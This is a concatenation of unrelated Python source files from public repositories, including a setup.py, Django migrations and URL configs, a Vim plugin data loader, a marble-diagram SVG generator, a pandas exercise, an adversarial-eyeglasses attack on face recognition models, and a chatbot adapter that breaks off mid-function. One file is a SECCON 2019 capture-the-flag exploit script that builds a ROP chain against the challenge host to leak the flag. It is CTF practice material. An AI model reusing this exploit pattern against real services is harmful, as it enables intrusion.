help='The path to the output summary file')
parser.add_argument('-n', '--output-numpy',
required=False,
help='The path to the output NumPy file')
parser.add_argument('-m', '--output-image-folder',
required=False,
help='The path to the output PNG folder')
args = parser.parse_args()
main(args)
| 3,491 |
setup.py
|
valq7711/websaw
| 1 |
2169829
|
import re
from setuptools import setup
def get_module_var(varname):
regex = re.compile(fr"^{varname}\s*\=\s*['\"](.+?)['\"]", re.M)
mobj = next(regex.finditer(open("websaw/__init__.py").read()))
return mobj.groups()[0]
__author__ = get_module_var('__author__')
__license__ = get_module_var('__license__')
__version__ = get_module_var('__version__')
setup(
name="websaw",
version=__version__,
url="https://github.com/valq7711/websaw",
license=__license__,
author=__author__,
author_email="<EMAIL>",
maintainer=__author__,
maintainer_email="<EMAIL>",
description="websaw - a web framework for rapid development with pleasure",
platforms="any",
keywords='python webapplication',
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Internet :: WWW/HTTP :: HTTP Servers",
"Topic :: Software Development :: Libraries :: Python Modules",
],
install_requires=[
"ombott",
"click",
"gunicorn",
"gevent",
"tornado",
"rocket3",
"threadsafevariable",
"pydal",
"pyjwt",
"yatl",
"requests",
"watchgod",
"renoir",
],
python_requires='>=3.7',
packages=['websaw', 'websaw.core', 'websaw.fixtures'],
)
| 1,632 |
digital_attack.py
|
yuhaoooo/agns-pytorch
| 0 |
2169544
|
'''
Digital attack by using accessarios
'''
import sys
import torch
import argparse
from module.discriminator import Discriminator
from module.generator import Generator
from module.utils.dataset import EyeGlasses, Crop
from torchvision import transforms
from torch.utils.data import DataLoader
from torch import optim
import torch.autograd as autograd
from torchvision.utils import save_image
from util import load_img, wear_eyeglasses, calc_loss
from module.target import FaceNet, ArcFace, CosFace
def main(args):
# ===========================
# Hyper parameters settings #
# ===========================
batch_size = args.batch_size
epochs = args.epochs
sample_interval = args.interval
device = 'cpu' if args.no_cuda else 'cuda:0'
lr = args.lr
pretrained_epochs = args.pretrained_epochs
classnum = 35
target_model = None
img_size = None
mode = args.mode
target = args.target
kappa = args.kappa
save_path = args.save_path
# ======================
# Summary Informations #
# ======================
print('# ===========================')
print('# Summary Informations')
print('# The attacked model [{}]'.format(args.target_model))
print('# The target class [{}]'.format(args.target))
print('# The attack mode [{}]'.format(args.mode))
print('# ===========================')
# ===========================
# Preparing datasets #
# ===========================
# loading eyeglasses dataset
eyeglasses = args.eyeglasses
trans = transforms.Compose([
Crop(25, 53, 176, 64),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
# loading attacker's images and eyeglasses mask
attacker_img = load_img(args.attacker, 224).to(device)
mask_img = load_img(args.mask, 224).to(device)
# ===========================
# Loading pretrained models #
# ===========================
# generator
gen = Generator().to(device)
pretrained_model = r'model\gen_{}.pt'.format(pretrained_epochs)
gen.load_state_dict(torch.load(pretrained_model))
optimizer_g = optim.Adam(gen.parameters(), lr=lr, betas=(0.5, 0.999))
# discriminator
disc = Discriminator().to(device)
pretrained_model = r'model\disc_{}.pt'.format(pretrained_epochs)
disc.load_state_dict(torch.load(pretrained_model))
optimizer_d = optim.Adam(disc.parameters(), lr=lr, betas=(0.5, 0.999))
# target model
if args.target_model == 'FaceNet':
target_model = FaceNet(device, classnum, r'model\finetuned_facenet.pt')
img_size = (160, 160)
elif args.target_model == 'CosFace':
target_model = CosFace(device, classnum, r'model\finetuned_cosface.pt')
img_size = (112, 96)
elif args.target_model == 'ArcFace':
target_model = ArcFace(device, classnum, r'model\finetuned_arcface.pt')
img_size = (112, 112)
else:
raise Exception(
'The target model [{}] is not defined!'.format(args.target_model))
# Loss function
adversarial_loss = torch.nn.BCELoss()
dataset = EyeGlasses(eyeglasses, trans)
loader = DataLoader(dataset, batch_size=batch_size, shuffle=True)
for epoch in range(epochs):
for idx, batch in enumerate(loader):
batch_size = batch.shape[0]
batch = batch.to(device)
# adversarial ground truths
valid = torch.ones((batch_size, 1), dtype=torch.float32).to(device) * 0.9
fake = torch.zeros((batch_size, 1), dtype=torch.float32).to(device)
# ==========================
# train generator #
# ==========================
for p in disc.parameters():
p.requires_grad = False
optimizer_g.zero_grad()
noise = torch.FloatTensor(
batch_size, 25).uniform_(-1.0, 1.0).to(device)
z = autograd.Variable(noise.data, requires_grad=True)
# discriminative loss
fake_images = gen(z)
g_loss = adversarial_loss(disc(fake_images), valid)
grads_disc_loss = autograd.grad(g_loss, gen.parameters(), retain_graph=True)
# attack loss
worn_imgs = wear_eyeglasses(fake_images, attacker_img, mask_img)
clf_loss, prob, _ = calc_loss(
target_model, worn_imgs, target, img_size, mode)
grads_clf_loss = autograd.grad(-1.0 * clf_loss, gen.parameters(), retain_graph=False)
# update generator parameters gradients
for i, p in enumerate(gen.parameters()):
grad_1 = grads_disc_loss[i]
grad_2 = grads_clf_loss[i]
if torch.norm(grad_1, p=2) > torch.norm(grad_2, p=2):
grad_1 = grad_1 * torch.norm(grad_2, p=2) / torch.norm(grad_1, p=2)
else:
grad_2 = grad_2 * torch.norm(grad_1, p=2) / torch.norm(grad_2, p=2)
p.grad = (kappa * grad_1 + kappa * grad_2).clone()
optimizer_g.step()
# ==========================
# train discriminator #
# ==========================
for p in disc.parameters():
p.requires_grad = True
optimizer_d.zero_grad()
fake_images = autograd.Variable(
fake_images.data, requires_grad=True)
real_loss = adversarial_loss(disc(batch), valid)
fake_loss = adversarial_loss(disc(fake_images), fake)
d_loss = (fake_loss + real_loss) / 2.0
d_loss.backward()
optimizer_d.step()
if idx % 50 == 0:
print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [Prob: %f] [Disc: %f]"
% (epoch, epochs, idx, len(loader), d_loss.item(), prob.item(), g_loss.item()))
batches_done = epoch * len(loader) + idx
if batches_done % sample_interval == 0:
save_image(worn_imgs.data[:25], "logs/%d.png" %
batches_done, nrow=5, normalize=False)
torch.save(gen.state_dict(), r'{}\gen_{}.pt'.format(save_path, epochs))
torch.save(disc.state_dict(), r'{}\disc_{}.pt'.format(save_path, epochs))
def parse(argv):
parser = argparse.ArgumentParser('Digital attack by using accessarios.')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=1,
help='number of epochs to train (default: 1)')
parser.add_argument('--lr', type=float, default=5e-5,
help='learning rate (default: 5e-5)')
parser.add_argument('--no_cuda', action='store_true',
default=False, help='disables CUDA training')
parser.add_argument('--interval', type=int, default=50,
help='how many batches to wait before printing')
parser.add_argument('--mode', type=str, default='dodge',
help='mode (dodge or impersonate) of attacking face recognition system (default: dodge)')
parser.add_argument('--target', type=int, default=0,
help='face-id of choosen victim (default: 0)')
parser.add_argument('--target_model', type=str, default='FaceNet',
help='attacked face recognition model (FaceNet, CosFace, ArcFace, default: FaceNet)')
# dataset setting
parser.add_argument('--eyeglasses', type=str,
default=r'data\eyeglasses', help='training eyeglasses dataset')
parser.add_argument(
'--mask', type=str, default=r'data\eyeglasses_mask_6percent.png', help='path of eyeglasses mask')
parser.add_argument('--attacker', type=str,
default=r'data\digital\19.jpg', help='the picture of attacker')
# params seeting
parser.add_argument('--kappa', type=float, default=0.25,
help='weight of generator\'s loss function')
# pretrained model
parser.add_argument('--pretrained_epochs', type=int,
default=200, help='number of epochs of trained model')
parser.add_argument('--save_path', type=str,
default='save', help='path to save trained model')
return parser.parse_args(argv)
if __name__ == "__main__":
args = parse(sys.argv[1:])
main(args)
| 8,697 |
product/migrations/0012_auto_20180827_1748.py
|
Nosaiba1/Avocado-Ecommerce
| 0 |
2170377
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-27 17:48
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('product', '0011_auto_20180808_1509'),
]
operations = [
migrations.RemoveField(
model_name='favorite',
name='product',
),
migrations.RemoveField(
model_name='product',
name='is_favourite_value',
),
migrations.DeleteModel(
name='Favorite',
),
]
| 582 |
Gathered CTF writeups/ptr-yudai-writeups/2019/SECCON_CTF_2019_Quals/lazy/listing.py
|
mihaid-b/CyberSakura
| 1 |
2169256
|
from ptrlib import *
elf = ELF("./lazy")
#sock = Process("./lazy")
sock = Socket("lazy.chal.seccon.jp", 33333)
def login_user(username):
sock.sendlineafter("Exit\n", "2")
sock.sendlineafter(": ", username)
sock.recvuntil(", ")
sock.recvline()
output = sock.recvline()
return output
def login_pass(password):
sock.sendlineafter(": ", password)
return
rop_pop_rdi = 0x004015f3
rop_pop_rsi_r15 = 0x004015f1
rop_popper = 0x4015e6
rop_csu_init = 0x4015d0
# leak flag
username = b'A' * (0x5f + 0x58)
login_user(username)
password = b'<PASSWORD>'
password += b'A' * (0x20 - len(password))
password += b'_<PASSWORD>'
password += b'A' * (0x40 - len(password))
password += b'<PASSWORD>'
password += b'A' * (0x60 - len(password))
password += b'_<PASSWORD>'
password += b'A' * (0x80 - len(password))
password += p64(0xdeadbeef)
password += p64(rop_popper)
password += p64(0)
password += p64(0)
password += p64(1)
password += p64(elf.got("read"))
password += p64(0x40)
password += p64(elf.section('.bss') + 0x200)
password += p64(0)
password += p64(rop_csu_init)
password += p64(0) * 2
password += p64(elf.section('.bss') + 0x800)
password += p64(0) * 4
password += <PASSWORD>(<PASSWORD>)
password += p64(elf.section('.bss') + 0x200)
password += <PASSWORD>(<PASSWORD>)
login_pass(password)
sock.send("/home/lazy/")
for i in range(10):
print(sock.recvline())
sock.interactive()
| 1,407 |
pythonforandroid/recipes/libogg/__init__.py
|
lstwzd/python-for-android
| 4 |
2170359
|
from pythonforandroid.recipe import NDKRecipe
from pythonforandroid.toolchain import current_directory, shprint
from os.path import join
import sh
class OggRecipe(NDKRecipe):
version = '1.3.3'
url = 'http://downloads.xiph.org/releases/ogg/libogg-{version}.tar.gz'
generated_libraries = ['libogg.so']
def build_arch(self, arch):
with current_directory(self.get_build_dir(arch.arch)):
env = self.get_recipe_env(arch)
flags = [
'--with-sysroot=' + self.ctx.ndk_platform,
'--host=' + arch.toolchain_prefix,
]
configure = sh.Command('./configure')
shprint(configure, *flags, _env=env)
shprint(sh.make, _env=env)
self.install_libs(arch, join('src', '.libs', 'libogg.so'))
recipe = OggRecipe()
| 833 |
teamcat_service/docker_build/target/one_step_build/teamcat/doraemon/home/viewmodels/vm_webapps.py
|
zhangyin2088/Teamcat
| 6 |
2169156
|
#coding=utf-8
'''
Created on 2015-11-27
@author: zhangtiande
'''
class VM_Webapps(object):
'''
classdocs
'''
def __init__(self,webapp,login_user):
'''
Constructor
'''
self.user=login_user
self.webapp=webapp
def is_public(self):
result=False
if self.webapp.app_visable_level==1:
result=True
return result
| 417 |
rxmarbles/generator.py
|
enbandari/rx-marbles
| 0 |
2170682
|
from __future__ import print_function
from pyparsing import *
from .svgshapes import *
import sys
import argparse
import math
import importlib
import html
import hashlib
start_character = "+"
nop_event_character = '-'
completion_symbol = "|"
error_character = "#"
infinity_character = ">"
colon = Suppress(":")
comment_start = "//"
nop_event = Word(nop_event_character, exact=1)
# our marble can be either single alphanumeric character, or multiple characters surrounded by ()
marble_text = alphanums
start_symbol = Suppress(start_character)
simple_marble = Word(marble_text, exact=1)
bracked_marble = Suppress("(") + Word(alphanums + "'\"._-") + Suppress(")")
groupped_marble = Combine("{" + Word(marble_text + ",") + "}")
marble = Or([simple_marble, bracked_marble , groupped_marble])
end = Or([completion_symbol, error_character, infinity_character]).setResultsName('end')
timeline_name = Or([QuotedString(quoteChar='"'), Word(alphanums + ",./<>?;'\"[]\{}|`~!@#$%^&*()-=_+")]).setResultsName('name')
source_keyword = "source"
operator_keyword = "operator"
event = Or([nop_event, marble])
events = Group(ZeroOrMore(event)).setResultsName('events')
padding = Optional(Word('.')).setResultsName('padding')
events_sequence = Group(padding + start_symbol + events + end).setResultsName('events_sequence', True)
skewed_group = Suppress("{") + OneOrMore(events_sequence) + Suppress("}")
type = Or([source_keyword, operator_keyword]).setResultsName('type')
source_or_operator = Group(type + timeline_name + colon + Or([events_sequence, skewed_group]))
marble_diagram_keyword = "marble"
marble_diagram_body = OneOrMore(source_or_operator)
marble_diagram_name = Word(alphanums + "_").setResultsName("diagram_name")
marble_diagram = Group(Suppress(marble_diagram_keyword) + marble_diagram_name + Suppress("{") + marble_diagram_body + Suppress("}"))
marble_diagrams = OneOrMore(marble_diagram)
marble_diagrams.ignore(comment_start + restOfLine)
def create_id_string(name):
return hashlib.md5(name.encode("utf-8")).hexdigest()
class Timeline:
def __init__(self, parsed_list, theme):
self.theme = theme
self.type = parsed_list.type
self.name = parsed_list.name
self.timelines = parsed_list.events_sequence
self.rotation_deg = 0
if len(self.timelines) > 1:
self.rotation_deg = 15
max_index = max(map(lambda x: 2 + len(x.events) + len(x.padding), self.timelines))
# this is used as distance on flat axis between two time events
self.base_thick_width = 50.0
# this is used as distance on skewed between two time events
self.tick_width = self.base_thick_width / math.cos(self.rotation_deg * math.pi / 180.0)
self.width = self.tick_width * max_index
self.top_margin = 30
self.total_height = 0
def create_groupped_symbol(self, o, x_offset, coloring):
# Sub-parsing groupped marble
ungroupped_marble = Suppress("{") + Word(marble_text) + ZeroOrMore(Suppress(",") + Word(marble_text)) + Suppress("}")
subitems = ungroupped_marble.parseString(o)
step_width = 1.0 * self.base_thick_width
body = ", ".join(map(lambda x: str(x), subitems))
width = step_width * len(subitems)
groupped_symbol = Struct(self.theme, x_offset, body, coloring, width, subitems, step_width)
return groupped_symbol
def __get_timeline_shapes(self, coloring, timeline_items):
# adding events
theme = self.theme
self.end = timeline_items.end
x_offset = 0
global parseString
for o in timeline_items.events:
if o.startswith('{') and o.endswith('}'):
groupped_symbol = self.create_groupped_symbol(o, x_offset, coloring)
self.symbols.append(groupped_symbol)
elif o != nop_event_character:
self.symbols.append(Marble(theme, x_offset, 0, o, coloring))
x_offset += self.tick_width
# adding completion, error or infinity_character symbol to the axis
if self.end == completion_symbol:
self.symbols.append(Terminate(theme, x_offset))
elif self.end == error_character:
self.symbols.append(Error(theme, x_offset))
# adding time axis
self.symbols.insert(0, Axis(theme, 0, x_offset + 2 * self.base_thick_width))
def get_svg(self, y, coloring, max_length):
svg = ""
yy = y + self.top_margin
for timeline_items in self.timelines:
self.symbols = []
self.__get_timeline_shapes(coloring, timeline_items)
x_offset = self.base_thick_width * len(timeline_items.padding)
g_id = self.type + "_" + create_id_string(self.name)
rot_yy = yy
svg += '<g id="%s" transform="rotate(%s %s %s) translate(%s,%s)">' % (g_id, self.rotation_deg, x_offset, rot_yy , x_offset, yy)
for obj in self.symbols:
svg += obj.get_shape()
h = obj.get_height()
if self.total_height < h + self.top_margin :
self.total_height = h + self.top_margin
svg += '</g>'
# and finally - inserting an extra axis - only when we are in the skewed block mode
if len(self.timelines) > 1:
max_padding = max(map(lambda x: len(x.padding), self.timelines))
a = Axis(self.theme, 0, self.base_thick_width * (4 + max_padding))
axisSvg = '<g id="skew" transform="translate(0 %s)">%s</g>' % (yy, a.get_shape())
svg = axisSvg + svg
return svg
def height(self):
"returns height in pixels. This must be called after get_svg()"
# let's calculate all bounding boxes
max_height = 0
for events_sequence in self.timelines:
timeline_width = self.base_thick_width * (1 + len(events_sequence.events))
timeline_height = self.total_height
bb = (timeline_width, timeline_height)
# width of the diagonal
diag = math.sqrt(bb[0] * bb[0] + bb[1] * bb[1])
alpha_rad = math.atan2(bb[1], bb[0])
alpha_deg = alpha_rad * 180.0 / math.pi
# after rotation
beta_deg = alpha_deg + self.rotation_deg
beta_rad = beta_deg * math.pi / 180.0
height = diag * math.sin(beta_rad)
if max_height < height:
max_height = height
return max_height
class Source(Timeline):
def __init__(self, parsed_list, theme):
Timeline.__init__(self, parsed_list, theme)
class Operator:
def __init__(self, parsed_list, theme):
self.theme = theme
self.timeline = Timeline(parsed_list, theme)
self.name = parsed_list.name
self.width = self.timeline.width
self.box_height = 80
self.top_margin = 10
def height(self):
"height in pixels"
return self.box_height + self.timeline.height() + 2 * self.top_margin
def get_svg(self, y, coloring, max_length):
theme = self.theme
box_y = y + self.top_margin
box = OperatorBox(theme, max_length, self.box_height, html.escape(self.name))
svg = '<g transform="translate(0 %s)">' % box_y
svg += box.get_shape() + self.timeline.get_svg(0 + self.box_height + self.top_margin, coloring, max_length)
svg += '</g>'
return svg
# ---------------------------------------------------
# events_sequence elements
# ---------------------------------------------------
def get_objects(parse_result, theme):
global source_keyword
global operator_keyword
result = []
for line in parse_result:
type = line[0]
if type == operator_keyword:
t = Operator(line, theme)
elif type == source_keyword:
t = Source(line, theme)
else:
raise Exception("unsupported type")
result.append(t)
return result
# other colouring schemes can be added here
palettes = {'default': ["#ffcc00", "#48b3cd", "#ffaacc", "#e5ff7c", "#ececec", "#a4ecff", "#ff6600", "#a0c800", "#ff3a3a", "#afafe9", "#db7c7c", "#80ffe6"]}
class Coloring:
'This object is stateful color provider for each of the marble'
def __init__(self, paletteName='default'):
global palettes
self.color_palette = palettes[paletteName]
self.colormap = {}
self.index = 0
def get_color_for(self, marbleId):
if not marbleId in self.colormap:
self.colormap[marbleId] = self.color_palette[self.index]
self.index += 1
if self.index >= len(self.color_palette):
self.index = 0
return self.colormap[marbleId]
class SvgDocument:
def __init__(self, row_objects, theme, scale):
self.theme = theme
self.scale = scale
self.coloring = Coloring()
self.row_objects = row_objects
# in pixels
self.max_row_width = max(map(lambda row: row.width, self.row_objects))
def get_document(self):
theme = self.theme
scale = self.scale
body = ""
y = 0
for row in self.row_objects:
body += row.get_svg(y, self.coloring, self.max_row_width)
y = y + row.height()
r = Root(theme, body, self.max_row_width, y, scale / 100.0)
return r.node
| 9,411 |
BACKEND-DJANGO/ratings/urls.py
|
CheboiDerrick/web-score
| 0 |
2170280
|
"""ratings URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from rest_framework.routers import DefaultRouter
from posts.views import ProjectViewSet, ProfileViewSet
from django.conf.urls.static import static
router = DefaultRouter()
router.register(r'api/v1/profile', ProfileViewSet, basename='Profile')
router.register(r'api/v1/projects', ProjectViewSet, basename='Project')
urlpatterns = [
path('admin/', admin.site.urls),
path('api/v1/', include('auth.urls')),
path('', include(router.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| 1,315 |
ABC/abc101-abc150/abc118/b.py
|
KATO-Hiro/AtCoder
| 2 |
2168234
|
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
ans = [0 for _ in range(30)]
for i in range(n):
ka = list(map(int, input().split()))
for j in ka[1:]:
ans[j - 1] += 1
result = 0
for a in ans:
if a == n:
result += 1
print(result)
if __name__ == '__main__':
main()
| 392 |
game/migrations/0010_auto_20200828_1951.py
|
atadams/bbstuff
| 0 |
2170822
|
# Generated by Django 3.1 on 2020-08-29 00:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('game', '0009_auto_20200825_1117'),
]
operations = [
migrations.AddField(
model_name='team',
name='primary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
migrations.AddField(
model_name='team',
name='secondary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
migrations.AddField(
model_name='team',
name='tertiary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
]
| 747 |
vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/module/loaddata.py
|
lougxing/gbox
| 0 |
2170691
|
# Tag Highlighter:
# Author: <NAME> <abudden _at_ gmail _dot_ com>
# Copyright: Copyright (C) 2009-2013 <NAME>
# Permission is hereby granted to use and distribute this code,
# with or without modifications, provided that this copyright
# notice is copied with it. Like anything else that's free,
# the TagHighlight plugin is provided *as is* and comes with no
# warranty of any kind, either expressed or implied. By using
# this plugin, you agree that in no event will the copyright
# holder be liable for any damages resulting from the use
# of this software.
# ---------------------------------------------------------------------
from __future__ import print_function
import os
import glob
import re
try:
from .debug import Debug
except ValueError:
def Debug(text, level):
print(text)
data_directory = None
leadingTabRE = re.compile(r'^\t*')
includeRE = re.compile(r'^%INCLUDE (?P<filename>.*)$')
envRE = re.compile(r'\$\{(?P<envname>[A-Za-z0-9_]+)\}')
def SetLoadDataDirectory(directory):
global data_directory
data_directory = directory
def EntrySplit(entry, pattern):
result = []
parts = entry.strip().split(pattern, 1)
if len(parts) == 1:
result = parts
elif ',' in parts[1]:
result = [parts[0], parts[1].split(',')]
else:
result = parts
return result
def ParseEntries(entries, indent_level=0):
index = 0
while index < len(entries):
line = entries[index].rstrip()
m = leadingTabRE.match(line)
this_indent_level = len(m.group(0))
unindented = line[this_indent_level:]
if len(line.strip()) == 0:
# Empty line
pass
elif line.lstrip()[0] == '#':
# Comment
pass
elif this_indent_level < indent_level:
return {'Index': index, 'Result': result}
elif this_indent_level == indent_level:
if ':' in unindented:
parts = EntrySplit(unindented, ':')
key = parts[0]
try:
result
except NameError:
result = {}
if not isinstance(result, dict):
raise TypeError("Dictionary/List mismatch in '%s'" % key)
if len(parts) > 1:
result[key] = parts[1]
else:
try:
result
except NameError:
result = []
if not isinstance(result, list):
raise TypeError("Dictionary/List mismatch: %r" % result)
result += [unindented]
else:
sublist = entries[index:]
subindent = indent_level+1
parsed = ParseEntries(sublist, subindent)
try:
result
except NameError:
result = {}
if key in result and isinstance(result[key], dict) and isinstance(parsed['Result'], dict):
result[key] = dict(result[key].items() + parsed['Result'].items())
else:
result[key] = parsed['Result']
index += parsed['Index'] - 1
index += 1
try:
result
except NameError:
result = {}
return {'Index': index, 'Result': result}
def LoadFile(filename):
fh = open(filename, 'r')
entries = fh.readlines()
index = 0
while index < len(entries):
m = includeRE.match(entries[index])
if m is not None:
# Include line
inc_file = m.group('filename').strip()
e = envRE.search(inc_file)
try:
while e is not None:
inc_file = inc_file[:e.start()] + \
os.environ[e.group('envname')] + \
inc_file[e.end():]
e = envRE.search(inc_file)
except KeyError:
raise
pass
if os.path.exists(inc_file):
fhinc = open(inc_file, 'r')
extra_entries = fhinc.readlines()
fhinc.close()
entries = entries[:index] + extra_entries + entries[index+1:]
else:
Debug("No such file: '%s'" % inc_file, "Warning")
index += 1
fh.close()
return ParseEntries(entries)['Result']
def LoadDataFile(relative):
filename = os.path.join(data_directory,relative)
return LoadFile(filename)
def GlobData(matcher):
files = glob.glob(os.path.join(data_directory, matcher))
return [os.path.relpath(i,data_directory) for i in files]
if __name__ == "__main__":
import pprint
pprint.pprint(LoadFile('testfile.txt'))
| 4,796 |
Web/demos/read_frames_fast.py
|
parvatijay2901/FaceNet_FR
| 6 |
2168950
|
# Modified from:
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
# Performance:
# Python 2.7: 105.78 --> 131.75
# Python 3.7: 15.36 --> 50.13
# USAGE
# python read_frames_fast.py --video videos/jurassic_park_intro.mp4
# import the necessary packages
from imutils.video import FileVideoStream
from imutils.video import FPS
import numpy as np
import argparse
import imutils
import time
import cv2
def filterFrame(frame):
frame = imutils.resize(frame, width=450)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = np.dstack([frame, frame, frame])
return frame
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="path to input video file")
args = vars(ap.parse_args())
# start the file video stream thread and allow the buffer to
# start to fill
print("[INFO] starting video file thread...")
fvs = FileVideoStream(args["video"], transform=filterFrame).start()
time.sleep(1.0)
# start the FPS timer
fps = FPS().start()
# loop over frames from the video file stream
while fvs.running():
# grab the frame from the threaded video file stream, resize
# it, and convert it to grayscale (while still retaining 3
# channels)
frame = fvs.read()
# Relocated filtering into producer thread with transform=filterFrame
# Python 2.7: FPS 92.11 -> 131.36
# Python 3.7: FPS 41.44 -> 50.11
#frame = filterFrame(frame)
# display the size of the queue on the frame
cv2.putText(frame, "Queue Size: {}".format(fvs.Q.qsize()),
(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)
# show the frame and update the FPS counter
cv2.imshow("Frame", frame)
cv2.waitKey(1)
if fvs.Q.qsize() < 2: # If we are low on frames, give time to producer
time.sleep(0.001) # Ensures producer runs now, so 2 is sufficient
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
fvs.stop()
| 2,190 |
ejercicios/ej_26_groupDataFrames.py
|
jorgemauricio/python
| 0 |
2169310
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 17 16:17:25 2017
@author: jorgemauricio
"""
# librerias
import numpy as np
import pandas as pd
from pandas import DataFrame, Series
# crear un dataframe
dframe = DataFrame({'k1':['X','X','Y','Y','Z'],
'k2':['alpha','beta','alpha','beta','alpha'],
'dataset1':np.random.randn(5),
'dataset2':np.random.randn(5)})
# desplegar
dframe
# tomamos la columan dataset1 y lo agrupamos con la llave k1
group1 = dframe['dataset1'].groupby(dframe['k1'])
# desplegar el objecto
group1
# ahora podemos realizar operaciones en este objeto
group1.mean()
# podemos utilizar los nombres de las columnas para generar las llaves de los grupos
dframe.groupby('k1').mean()
# o multiples columnas
dframe.groupby(['k1','k2']).mean()
# podemos saber el tamaño del grupo con el metodo .size()
dframe.groupby(['k1']).size()
# podemos iterar entre los grupos
# por ejemplo:
for name,group in dframe.groupby('k1'):
print ("This is the %s group" %name)
print (group)
print ('\n')
# utilizando multiples llaves
for (k1,k2) , group in dframe.groupby(['k1','k2']):
print ("Key1 = %s Key2 = %s" %(k1,k2))
print (group)
print ('\n')
# se puede generar un diccionario de la informacion
group_dict = dict(list(dframe.groupby('k1')))
# desplegar el grupo con una 'X'
group_dict['X']
| 1,411 |
csv2yaml/__main__.py
|
sepandhaghighi/csv2yaml
| 12 |
2169741
|
# -*- coding: utf-8 -*-
from .csv2yaml import *
import time
import sys
import doctest
import os
def run(filename,header=None,error_pass=False):
first_time = time.perf_counter()
print("Converting ... ")
json_size=json_convert(filename,header=header,error_pass=error_pass)
if json_size!=None:
pickle_size=json_to_pickle(filename,error_pass=error_pass)
yaml_size=json_to_yaml(filename,error_pass=error_pass)
print(json_size)
print(pickle_size)
print(yaml_size)
second_time = time.perf_counter()
elapsed_time = second_time - first_time
elapsed_time_format = time_convert(str(elapsed_time))
print("Converted In " + elapsed_time_format)
print("Where --> " + Source_dir)
line()
if __name__=="__main__":
args=sys.argv
if len(args)>1:
if args[1].upper()=="TEST":
doctest.testfile("test.py",verbose=True)
elif args[1].upper()=="ALL":
file_header=None
if len(args)>2:
file_header=args[2]
for file in os.listdir():
if file.find(".csv")!=-1:
run(filename=file,header=file_header,error_pass=True)
elif args[1].upper()=="HELP":
help_func()
elif len(args)>2:
run(args[1],header=args[2])
else:
run(args[1])
else:
help_func()
sys.exit()
| 1,403 |
research_app/ContentSchema.py
|
APrioriInvestments/research_frontend
| 0 |
2170366
|
# Copyright 2019 APriori Investments
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Content-management schema for the research frontend.
"""
import time
from typed_python import OneOf
from object_database import Schema, Indexed, current_transaction
schema = Schema("research_app.ContentSchema")
@schema.define
class ModuleContents:
# gives the prior script in edit-time - if we navigate to an old script and edit it,
# that older script will be the parent.
parent = OneOf(None, schema.ModuleContents)
timestamp = float
# actual contents of the script
contents = str
@schema.define
class Project:
name = Indexed(str)
created_timestamp = float
last_modified_timestamp = float
def deleteSelf(self):
self.delete()
@schema.define
class Module:
name = Indexed(str)
project = Indexed(schema.Project)
current_buffer = str
prior_contents = OneOf(None, ModuleContents)
last_modified_timestamp = float
created_timestamp = float
def update(self, buffer):
"""the user updated the text in the background, but hasn't tried to execute it yet."""
self.current_buffer = buffer
def mark(self):
"""Snapshot this version of the module."""
self.prior_contents = ModuleContents(
parent=self.prior_contents,
contents=self.current_buffer,
timestamp=time.time()
)
def deleteSelf(self):
self.delete()
| 1,980 |
app/chatterbot_custom/covid_adapter.py
|
phu-bui/chatbot_covid19
| 3 |
2169884
|
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
import logging
from app.services.stats_service import getUsStats, getUkStats
from app.services.news_service import getNews
import random
logging.basicConfig(level=logging.INFO)
class CustomLogicAdapter(LogicAdapter):
def can_process(self, statement):
input_words = ['uk', 'us', 'covid','stats','uk confirmed','uk deaths','uk recovered','uk critical',
'us confirmed','us deaths','us recovered','us critical','all','good news', 'good covid news',
'tell me someting good','coronavirus positive news','covid positive news',
'Hi', 'Howdy', 'Hello','until next time', 'bye','ciao', 'adios','its been real'
]
if any(x.lower() for x in input_words):
return True
else:
return False
def process(self, input_statement, additional_response_selection_parameters):
user_input = input_statement.text.lower()
uk_response = getUkStats()
us_response = getUsStats()
news_response = getNews()
if 'uk confirmed' in user_input:
confirmed = uk_response[0].get("confirmed", "")
